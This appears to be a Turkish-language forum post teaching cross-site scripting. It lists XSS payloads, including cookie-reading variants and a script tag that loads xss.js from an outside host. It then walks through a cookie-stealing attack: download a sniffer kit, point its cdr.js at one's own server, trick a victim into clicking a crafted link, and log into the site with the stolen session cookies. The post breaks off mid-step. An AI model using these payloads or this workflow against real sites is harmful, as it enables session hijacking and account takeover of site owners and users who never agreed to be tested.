SABITLENMESI DILEGI İLE;
Web uygulamarının sebebiyet verdiği bu açık sayesinde saldırgan hazırladığı zararlı kodları yine kendi hazırladığı bir sayfaya saklayarak, hedefteki kullanıcıyı bu sayfaya yönlendirmesiyle veya yönlendirmeden o esnada aralarında iletişim için kullandıkları web uygulamasının arka planına saklayarak hedefteki kullanıcıya iletmesi ile meydana gelir. Kullanıcı bu sırada hiçbirşeyin farkına varmaz fakat o esnada oturum bilgileri gibi pek çok önemli bilgisi saldırganın istediği bir sayfaya kaydedilir.
Bu açığı bulmak kolay olduğu gibi açığın kapatılmasıda kolaydır. Genellikle POST ve GET metodlarının kullanıldığı bölümlerde bulunur. Arama, galeri, mesajlar, haberler, üyelikler, kategoriler, yorumlar gibi kısımlara XSS kodumuzu enjekte ederek test edebilirsiniz.
Örnek vermek gerekirse, test için en çok kullanılan XSS kodları:
CODE:
- ">**********alert(1)</script>
- http://www.site.com/index.php?s=">**********alert(1)</script>
- ">**********alert(********.cookie)</script>
- http://www.site.com/index.php?cat=">**********alert(********.cookie)</script>
- ');alert('own');//
- [url]https://tik.lat/o2aSY
- ');alert('own');//
- "><script/src=http://site.com/xss.js></script>
- http://www.site.com/gallery.asp?c="><script/src=http://site.com/xss.js></script>
- >**********alert('XSS Vulnerable')</script><b a=a
- http://www.site.com/members.php?id=>**********alert('XSS Vulnerable')</script><b a=a
Üstteki resimde de görüldüğü gibi XSS kodumuzu denedikten sonra ekrana bizim cookie bilgilerimizi yansıttı. Bu da bize sitede XSS açığının olduğunu gösteriyor. Bu açık site sahibinin ve diğer kullanıcıların cookielerini almamıza olanak sağlar. Böylece onların yetkileriyle siteye giriş yapabiliriz.
Bu kodlardan daha fazla edinmek isterseniz tam bir XSS Kod Kütüphanesi olan sitemin "XSS Attack Database" [url]https://tik.lat/IperA [/B]
[/LIST]
Daha sonra test için şöyle bir sayfa oluşturarak kontrol edebilirsiniz. Şu kodları "html" olarak kaydedin.
[url]https://tik.lat/wkn3R
Download Video (968kb)
https://tik.lat/SRW62
Şimdi bu açığın nasıl kullanıldığını görelim. Video'da da görüldüğü gibi kaydedilen cookie'leri görebilmemiz için bir "log" dosyamız olması gerekiyor. Gerekli olan gereçleri önce bu adresten indirin.
Download Sniffer
https://tik.lat/NqQ1H
Dosyamızı indirip klasöre açalım, değişiklik yapacağımız dosyalar sırasıyla "cdr.js" ve karşı tarafa yollayacağınız link olan "pardus.html" ben deneme için pardus olarak adlandırdım siz istediğiniz şekilde yapabilirsiniz.
"cdr.js" dosyasını bir metin belgesiyle açın, dosyada "siteniz.com" yazan yere "sniffer" klasörünü upload ettiğiniz internet adresini yazacaksınız.
[url]https://tik.lat/0Zm9j gibi burada dosya adını değiştirebilirsiniz. Size kalan bu linki karşı tarafa zekice yollayarak, yolladığınız kişinin bu linke tıklamasını sağlamak. Yolladığınız kişi linke tıkladıysa "cookie" bilgileri "log" dosyasında görülecektir.
Burada "log" dosyasının herkes tarafından görünmesini istemeyebilirsiniz. Bunun için "log" dosyasına ulaşmak için bir "login" ekranı koyabiliriz. "log.php" dosyasını bir metin belgesiyle açın ve sayfanın en başında olan
[url]https://tik.lat/gKbSJ [/COLOR][/LEFT]
Son düzenleme: